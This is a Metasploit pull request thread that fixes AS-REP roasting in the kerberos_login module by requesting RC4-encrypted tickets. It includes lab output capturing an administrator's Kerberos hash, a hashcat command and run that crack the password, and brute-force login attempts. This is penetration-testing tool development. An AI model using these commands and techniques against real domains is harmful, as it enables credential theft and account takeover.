
Get crackable ASREP hashes #18338

Merged (3 commits), Oct 2, 2023

Conversation

smashery
Contributor

@smashery smashery commented Sep 4, 2023

This PR fixes the ASREP roasting workflow in Metasploit, which resolves #17988. A note on that ticket: That ticket states that the behaviour (and thus the bug) is in the get_user_spns module, but that module is actually TGS-REP roasting (kerberoasting), and I was unable to reproduce any issues with that module. But the issue correctly describes a replicable issue in the kerberos_login module, so that's what this ticket addresses.

The cause of this issue was that, when we offer AES ciphers alongside our RC4 cipher, the server complies, and gives us an ASREP encrypted with one of the AES ciphers. Cracking this is slow, and is not currently supported by JtR or Hashcat, so is less valuable. To fix this, we just tell the server that we only support RC4_HMAC, and it gives us what we want.

If we made only this change, it would potentially break the login scanner in the (admittedly rare) situation where RC4 has been disabled in the domain. So if we receive an "encryption type not supported" error, we retry with our defaults.

Verification

  • Configure a domain containing a user with pre-authentication disabled
  • Start msfconsole
  • use kerberos_login
  • Run the module against the pre-auth-disabled user
  • Verify that the output has etype 23
  • Verify that the hash is crackable by hashcat, using a wordlist containing the correct password: hashcat -m18200 '$krb5asrep$23$user...' -a 3 --force /tmp/wordlist
  • Verify that the kerberos_login module still works to brute force passwords for users without pre-auth disabled
  • Verify that the kerberos_login module still works to brute force passwords for users without pre-auth disabled, when RC4 is disabled in the domain (In Group Policy, Computer Configuration >> Windows Settings >> Security Settings >> Local Policies >> Security Options >> "Network security: Configure encryption types allowed for Kerberos")
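The etype negotiation the PR describes, as an added example that is not Metasploit's own code: a mock KDC and the two client strategies (offer all defaults vs. offer RC4_HMAC first and fall back on KDC_ERR_ETYPE_NOSUPP). Etype numbers and error codes are the RFC 4120 values; the mock KDC's preference order and its pre-auth handling are assumptions.

```ruby
# Added example, not Metasploit's own code: a mock of the AS-REQ etype
# negotiation this PR changes. Etype numbers and KDC error codes are the
# RFC 4120 values; the KDC and account behaviour below are simplified.
RC4_HMAC = 23
AES128_CTS_HMAC_SHA1_96 = 17
AES256_CTS_HMAC_SHA1_96 = 18
KDC_ERR_ETYPE_NOSUPP = 14
KDC_ERR_PREAUTH_REQUIRED = 25

# What the module offered before the fix (strongest first).
DEFAULT_ETYPES = [AES256_CTS_HMAC_SHA1_96, AES128_CTS_HMAC_SHA1_96, RC4_HMAC].freeze

AsRep = Struct.new(:etype)
KrbError = Struct.new(:code)

# Mock KDC: refuses if no offered etype is allowed in the domain, demands
# pre-auth if the account requires it, otherwise encrypts the AS-REP with
# the strongest etype both sides allow (assumed domain preference order).
def mock_kdc(offered, domain_etypes:, preauth_required:)
  common = domain_etypes & offered
  return KrbError.new(KDC_ERR_ETYPE_NOSUPP) if common.empty?
  return KrbError.new(KDC_ERR_PREAUTH_REQUIRED) if preauth_required
  AsRep.new(common.first)
end

# Pre-fix behaviour: offer everything, so an AES-capable domain answers
# with an AES-encrypted AS-REP that hashcat and JtR do not handle.
def request_as_rep_old(domain_etypes:, preauth_required:)
  mock_kdc(DEFAULT_ETYPES, domain_etypes: domain_etypes, preauth_required: preauth_required)
end

# PR behaviour: offer RC4_HMAC only; fall back to the defaults only when
# the KDC reports the etype as unsupported, so the login scanner keeps
# working in domains where RC4 has been disabled by Group Policy.
def request_as_rep_new(domain_etypes:, preauth_required:)
  reply = mock_kdc([RC4_HMAC], domain_etypes: domain_etypes, preauth_required: preauth_required)
  if reply.is_a?(KrbError) && reply.code == KDC_ERR_ETYPE_NOSUPP
    reply = mock_kdc(DEFAULT_ETYPES, domain_etypes: domain_etypes, preauth_required: preauth_required)
  end
  reply
end

# hashcat -m 18200 covers etype 23 AS-REPs only, so check the negotiated
# etype before assuming that mode applies.
def crackable_with_18200?(reply)
  reply.is_a?(AsRep) && reply.etype == RC4_HMAC
end
```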

@jvoisin
Contributor

jvoisin commented Sep 4, 2023

Cracking this is slow, and is not currently supported by JtR or Hashcat, so is less valuable.

It might be worth opening an issue to both of them to get this added :P

@h00die
Contributor

h00die commented Sep 4, 2023

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat

Looks like it is supported by at least hashcat? Untried. But @smashery's ticket says it's not supported and then cracks it with hashcat anyways, so I'm a bit confused.

@smashery I guess I'm the hash and crack person for msf, and had planned to take a look at this tomorrow. If I see things (formatters etc) to get this working, I'll send you a PR

@adfoster-r7
Contributor

Preferencing RC4_HMAC for the default offered etype makes sense to me - I believe this was the default/only behavior before all of the awesome work to support additional etypes was added 😄

@adfoster-r7
Contributor

adfoster-r7 commented Sep 4, 2023

The docs call out using hashcat for ASREPRoasting (rendered)

### ASREPRoasting
Accounts that have `Do not require Kerberos preauthentication` enabled, will receive an ASREP response with a ticket-granting-ticket present.
The technique of cracking this ticket offline is called ASREPRoasting.
Cracking ASREP response with John:
```
john ./hashes.txt --wordlist=./wordlist.txt --format:krb5asrep
```
Cracking ASREP response with Hashcat:
```
hashcat -m 18200 -a 0 ./hashes.txt ./wordlist.txt
```
You can see previously cracked creds with:
```
creds -v
```

But on reflection the docs aren't super great, since it doesn't really call out when you should use john or hashcat, or that 18200 isn't always correct depending on the negotiated etype (which is easy to trip up users IMO):

From hashcat's docs

| Hash-Mode | Hash-Name | Example |
|---|---|---|
| 18200 | Kerberos 5, etype 23, AS-REP | $krb5asrep$23$user@domain.com:3e156ada591263b8aab0965f5aebd837$0074... |

@smashery
Contributor Author

smashery commented Sep 4, 2023

@h00die - to clarify the apparent discrepancy: cracking ASREPs is supported by Hashcat... as long as the DC encrypts the ASREP with the RC4_HMAC etype. If the DC encrypts the ASREP with, say, AES256 or AES128, it's theoretically crackable... but it's not currently supported by Hashcat (and if it were, would be hella slow, so we prefer RC4). The bug described here is that when MSF receives an ASREP from a DC that supports AES, it will be encrypted with AES - which is not currently supported by Hashcat. So by telling the DC "I only support RC4_HMAC", it will send us an ASREP encrypted with RC4_HMAC, which is currently supported by Hashcat.

@h00die
Contributor

h00die commented Sep 7, 2023

This fell off my radar, go ahead and land it, and I'll get another PR later to put the hash cracking/identification/etc in all the things. No sense holding it up.

@jheysel-r7 jheysel-r7 self-assigned this Oct 2, 2023
@jheysel-r7
Contributor

Changes look good and testing was as expected. Thanks for the PR as well as the detailed verification steps.

Verification

  • Configure a domain containing a user with pre-authentication disabled
    • Windows Server 2019 AD - Administrator account pre-auth disabled
  • Start msfconsole
  • use kerberos_login
  • Run the module against the pre-auth-disabled user

```
msf6 auxiliary(scanner/kerberos/kerberos_login) > run

[*] Using domain: EXAMPLE.COM - 172.16.199.132:88    ...
[+] 172.16.199.132 - User: "administrator" does not require preauthentication. Hash: [email protected]:9aaf5d03670c5ad820f07937676e6797$2a0dd260cf0722a5aa2fd9bba54893dd9495a4cfb22c53b0be28106a73aea9789ac88e4a992b20e577b773a91446f67b3446a695afb35eadadca5978ec498aa91e40a6743e661f7ea19b1fa5a43a321cb0869385b51ff6dabbe311b125c89ecc56c173da4895801a614ec2375df35f2313cec39e187abda21eb969a08010e5a68b11043b8524cdab95f78690492d04bb9dbecba6ec2563144741b0876d29134a3a423f807aee59013a4969e92c395baaa6388f6f3d5ed76304f0f5f044b5dfd758b78ea27ca3895d89861abc84ccc4bbb5acbfbf64b6016c93794e74a36f158f7a54e782c34b007317
[!] No active DB -- Credential data will not be saved!
[*] Auxiliary module execution completed
```
  • Verify that the output has etype 23
  • Verify that the hash is crackable by hashcat, using a wordlist containing the correct password: hashcat -m18200 '$krb5asrep$23$user...' -a 3 --force /tmp/wordlist

```
└─$ hashcat -m18200 '[email protected]:9aaf5d03670c5ad820f07937676e6797$2a0dd260cf0722a5aa2fd9bba54893dd9495a4cfb22c53b0be28106a73aea9789ac88e4a992b20e577b773a91446f67b3446a695afb35eadadca5978ec498aa91e40a6743e661f7ea19b1fa5a43a321cb0869385b51ff6dabbe311b125c89ecc56c173da4895801a614ec2375df35f2313cec39e187abda21eb969a08010e5a68b11043b8524cdab95f78690492d04bb9dbecba6ec2563144741b0876d29134a3a423f807aee59013a4969e92c395baaa6388f6f3d5ed76304f0f5f044b5dfd758b78ea27ca3895d89861abc84ccc4bbb5acbfbf64b6016c93794e74a36f158f7a54e782c34b007317' -a 3 --force wordlist
hashcat (v6.1.1) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz, 1407/1471 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 134 MB
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
[email protected]:9aaf5d03670c5ad820f07937676e6797$2a0dd260cf0722a5aa2fd9bba54893dd9495a4cfb22c53b0be28106a73aea9789ac88e4a992b20e577b773a91446f67b3446a695afb35eadadca5978ec498aa91e40a6743e661f7ea19b1fa5a43a321cb0869385b51ff6dabbe311b125c89ecc56c173da4895801a614ec2375df35f2313cec39e187abda21eb969a08010e5a68b11043b8524cdab95f78690492d04bb9dbecba6ec2563144741b0876d29134a3a423f807aee59013a4969e92c395baaa6388f6f3d5ed76304f0f5f044b5dfd758b78ea27ca3895d89861abc84ccc4bbb5acbfbf64b6016c93794e74a36f158f7a54e782c34b007317:N0tpassword!

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: [email protected]:9aaf5d03670...007317
Time.Started.....: Mon Oct  2 12:34:57 2023, (0 secs)
Time.Estimated...: Mon Oct  2 12:34:57 2023, (0 secs)
Guess.Mask.......: N0tpassword! [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:        8 H/s (0.08ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: N0tpassword! -> N0tpassword!
Started: Mon Oct  2 12:34:27 2023
Stopped: Mon Oct  2 12:34:58 2023
```
  • Verify that the kerberos_login module still works to brute force passwords for users without pre-auth disabled

Revert the pre-auth disabled setting for the Administrator account, then test:

```
msf6 auxiliary(scanner/kerberos/kerberos_login) > set pass_file /tmp/wordlist
pass_file => /tmp/wordlist
msf6 auxiliary(scanner/kerberos/kerberos_login) > run

[*] Using domain: EXAMPLE.COM - 172.16.199.132:88    ...
[+] 172.16.199.132 - User: "administrator" is present
[!] No active DB -- Credential data will not be saved!
[*] 172.16.199.132 - User: "administrator" wrong password derp
[*] 172.16.199.132 - User: "administrator" wrong password derp2
[+] 172.16.199.132 - User found: "administrator" with password N0tpassword!. Hash: [email protected]:6b0ed000c7ec840ba3a38954820518ec$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
[*] Auxiliary module execution completed
```
  • Verify that the kerberos_login module still works to brute force passwords for users without pre-auth disabled, when RC4 is disabled in the domain (In Group Policy, Computer Configuration >> Windows Settings >> Security Settings >> Local Policies >> Security Options >> "Network security: Configure encryption types allowed for Kerberos")

Disable RC4:
[Screenshot 2023-10-02 at 12 58 48 PM]

Force update the Group Policy changes:

```
C:\Users\Administrator>gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.


C:\Users\Administrator>
```

Confirm brute forcing still works:

```
msf6 auxiliary(scanner/kerberos/kerberos_login) > run

[*] Using domain: EXAMPLE.COM - 172.16.199.132:88    ...
[+] 172.16.199.132 - User: "administrator" is present
[!] No active DB -- Credential data will not be saved!
[*] 172.16.199.132 - User: "administrator" wrong password derp
[*] 172.16.199.132 - User: "administrator" wrong password derp2
[+] 172.16.199.132 - User found: "administrator" with password N0tpassword!. Hash: [email protected]:b5d7a0474c555586d0f3f2675df80ffa$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
[*] Auxiliary module execution completed
```

@jheysel-r7 jheysel-r7 merged commit 50e4269 into rapid7:master Oct 2, 2023
32 checks passed
@jheysel-r7
Contributor

Release Notes

This PR updates the kerberos.rb library such that when a kerberos login is attempted on a user where pre-authentication is not required, the module now requests an RC4-HMAC ticket, since it's more easily crackable.

@jheysel-r7 jheysel-r7 added enhancement rn-enhancement release notes enhancement labels Oct 2, 2023
Successfully merging this pull request may close these issues.

auxiliary/gather/get_user_spns does not output a breakable encryption format of Kerberos AS-REP message